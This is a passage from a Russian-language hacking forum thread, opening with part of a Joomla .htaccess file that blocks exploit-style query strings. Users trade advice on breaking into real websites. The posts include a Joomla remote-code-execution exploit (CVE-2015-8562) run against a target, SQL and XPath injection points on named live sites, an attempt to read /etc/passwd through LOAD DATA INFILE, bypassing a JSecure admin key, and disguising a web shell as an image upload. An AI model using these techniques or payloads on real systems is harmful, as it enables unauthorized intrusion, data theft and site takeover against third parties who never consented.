# Block out any script that includes a tag in URL

RewriteCond %{QUERY_STRING} (|%3E) [NC,OR]

# Block out any script trying to set a PHP GLOBALS variable via URL

RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

# Block out any script trying to modify a _REQUEST variable via URL

RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

# Return 403 Forbidden header and show the content of the root homepage

RewriteRule .* index.php [F]

#

########## End - Rewrite rules to block out some common exploits

########## Begin - Custom redirects

#

# If you need to redirect some pages, or set a canonical non-www to

# www redirect (or vice versa), place that code here. Ensure those

# redirects use the correct RewriteRule syntax and the [R=301,L] flags.

#

########## End - Custom redirects

# Uncomment following line if your webserver's URL

# is not directly related to physical file paths.

# Update Your Joomla! Directory (just / for root)

# RewriteBase /

########## Begin - Joomla! core SEF Section

#

RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]

#

# If the requested path and file is not /index.php and the request

# has not already been internally rewritten to the index.php script

RewriteCond %{REQUEST_URI} !^/index\.php

# and the request is for root, or for an extensionless URL, or the

# requested URL ends with one of the listed extensions

RewriteCond %{REQUEST_URI} (/[^.]*|\.(php|html?|feed|pdf|raw))$ [NC]

# and the requested path and file doesn't directly match a physical file

RewriteCond %{REQUEST_FILENAME} !-f

# and the requested path and file doesn't directly match a physical folder

RewriteCond %{REQUEST_FILENAME} !-d

# internally rewrite the request to the index.php script

RewriteRule .* index.php [L]

#

########## End - Joomla! core SEF Section

Еще вопрос: на сайте джумла 1.5.15. Версия древняя и должна быть уязвима к https://www.exploit-db.com/exploits/39033/.

python joomrce2.py -t http://www.site.com/ --cmd

[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://www.site.com/

[-] Dropping into shell-like environment to perform blind RCE

$ touch /var/полный путь к сайту из конфига БД/administrator/adm.php

$

Но результат нулевой - при попытке http://www.site.com/administrator/adm.php ошибка 404.

Опять же из базы добыл инфу, что на папку /var/полный путь к сайту из конфига БД/administrator/ установлены права drwxrwxrwx

Версию php не могу найти - видимо не подходящая для сплойта

Warning: XSLTProcessor::transformToXml(): Cannot create XPath expression (string contains both quote and double-quotes)

SQL?

.Light. said:
↑ (https://antichat.live/posts/3974142/)
Warning: XSLTProcessor::transformToXml(): Cannot create XPath expression (string contains both quote and double-quotes)
SQL?


Судя по тексту это скорее XPath инъекуция, о которой более подробоно можно почитать например на сайте OWASP или в блоге разора (ссылку прикладывать не буду, если надо сам найдешь.)

DarkCaT said:
↑ (https://antichat.live/posts/3974167/)
Судя по тексту это скорее XPath инъекуция, о которой более подробоно можно почитать например на сайте OWASP или в блоге разора (ссылку прикладывать не буду, если надо сам найдешь.)


а есть софт под данную иньекцию?

.Light. said:
↑ (https://antichat.live/posts/3974193/)
а есть софт под данную иньекцию?


Скульмап нормально крутит XPATH-инъекции.

Инклудятся ли логи при чтении через sql инъекцию?

Shubka75 said:
↑ (https://antichat.live/posts/3974646/)
Инклудятся ли логи при чтении через sql инъекцию?


как вы себе это представляете? нет

скуля union(select 1,2,3) срабатывает только с +--+ ,хотя union select 1,2,3' (без скобок) работает. Почему так происходит?

нашел скрипт на одном сайте типа site.com/check.php если просто перейти по нему то выводит это:


Notice: Undefined index: login in /var/www/***/check.php on line 5


требует логина..если запрос сделать site.com/check.php?login=admin выводит:


{"id":"1","login":"Admin"} это результат JSON


могут ли быть какие варианты?пробовал типа login=admin&pass и.т.п безрезультатно

Хелп.

Есть расрученная скуль. File_priv="N" Двиг: джумла 1.5.15. Есть пароль админа, но, судя по информации из таблиц о плагинах - стоит JSecure и редиректит всегда на главную. Как можно посмотреть его секретный ключ? Все таблицы облазил - не нашел. Читал, что можно глянуть в XML файле конфига JSecure, но никак не могу это сделать через "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'". Скажите, какие условия нужны для чтения файлов таким способом и как это реализуется?

Code:
http://www.gorobzor.ru/articles/sportzhizn/mir-v-ozhidanii-evro-2016-vo-francii-09-02-2016'

Вывод ошибки в title , возможно ли раскрутить? Пробовал sqlmap, без результата

semik said:
↑ (https://antichat.live/posts/3976148/)
Хелп.
Есть расрученная скуль. File_priv="N" Двиг: джумла 1.5.15. Есть пароль админа, но, судя по информации из таблиц о плагинах - стоит JSecure и редиректит всегда на главную. Как можно посмотреть его секретный ключ? Все таблицы облазил - не нашел. Читал, что можно глянуть в XML файле конфига JSecure, но никак не могу это сделать через "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'". Скажите, какие условия нужны для чтения файлов таким способом и как это реализуется?


Так если у тебя есть пароль админа в чем проблема? Заходи в админку joomla и заливай шелл.

tiger_x said:
↑ (https://antichat.live/posts/3976255/)
Так если у тебя есть пароль админа в чем проблема? Заходи в админку joomla и заливай шелл.




стоит JSecure и редиректит всегда на главную


При вводе site.com/administrator/ редиректит на главную. Судя по всему JSecure плагин, который меняет адрес админки на site.com/administraor/?secret_key Вот этот самый секрет кей мне и нужен. Может, конечно, и htaccess жить мешает.. БД - MySql 5.1.66-log. В базе есть инфа о времени последнего входа админа - прочитать бы через скуль логи апача в это время - было бы шикарно, выявился бы линк админки, но запросам типа "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'" выдает [WARNING] execution of custom SQL queries is only available when stacked queries are supported - уязвимый скрипт не позволяет такое выполнять.

Сервер не шаред - на айпишнике один сайт - phpmyadmin отсутствует. Все плагины уже проверил на паблик уязвимости - бесполезно Ну очень нужен шелл...

если именно этот плагин попробуй поискать jos_plugins и там System - jSecure Authentication там должен быть key=твое секретное слово

shell_c0de said:
↑ (https://antichat.live/posts/3976415/)
если именно этот плагин попробуй поискать jos_plugins и там System - jSecure Authentication там должен быть key=твое секретное слово


Смотрел - нету.

131 0 System - jsecure 0 system 0 jsecure 7 1 0 0000-00-00 00:00:00

Вот строка. Key параметра нет. published - 1 - значит плагин активен.

powerOfthemind said:
↑ (https://antichat.live/posts/3976182/)

Code:
http://www.gorobzor.ru/articles/sportzhizn/mir-v-ozhidanii-evro-2016-vo-francii-09-02-2016'

Вывод ошибки в title , возможно ли раскрутить? Пробовал sqlmap, без результата


Сайт вобще весь дырявый. Мне лично было проще раскрутить


Code:
http://www.gorobzor.ru/vibor2012/validEmail.php?Email='

Есть сайт, заходя в админку не подгружает картинки и js, из-за того что коряво настроен код админки или что то намутили админы.

Тоесть пытается подгрузить данные по пути admin.site.com, которого же не существует ( существует, но при переходе на него перебрасывает на основной на главную).

При изменении исходного когда с http://admin.site.com/media... на обычный http://site.com/media... все грузит и показывает как надо.

Нужно сделать как то это автоматически, без ручного исправления кода каждый раз, какие есть варианты? с hosts не получается ничего.

Br@!ns said:
↑ (https://antichat.live/posts/3979499/)
Есть сайт, заходя в админку не подгружает картинки и js, из-за того что коряво настроен код админки или что то намутили админы.
Тоесть пытается подгрузить данные по пути admin.site.com, которого же не существует ( существует, но при переходе на него перебрасывает на основной на главную).
При изменении исходного когда с
http://admin.site.com/media
... на обычный
http://site.com/media
... все грузит и показывает как надо.
Нужно сделать как то это автоматически, без ручного исправления кода каждый раз, какие есть варианты? с hosts не получается ничего.


например так:

http://savepic.ru/9556558.png

а почему с hosts не выходит?

yarbabin said:
↑ (https://antichat.live/posts/3979518/)
например так:
http://savepic.ru/9556558.png
а почему с hosts не выходит?


Просто неработает, непонятно. мб потому как при заходе на ип адрес сайт не открывает.

А что за плагин такой?

Br@!ns said:
↑ (https://antichat.live/posts/3979520/)
Просто неработает, непонятно. мб потому как при заходе на ип адрес сайт не открывает.
А что за плагин такой?


burp suite же

может плагин какой есть для фф под это дело? с burp suite непоулчается

Заливаю шел через картинку пропускает но сохраняет под имени file. точка в конец как обоити ? + пишет Невозможно получить длину и ширину изображения

Неподскажите, можно ли через phpmyadmin коннектиться к произвольному серверу, как в админере? без дополнительных настроек в /setup/ ?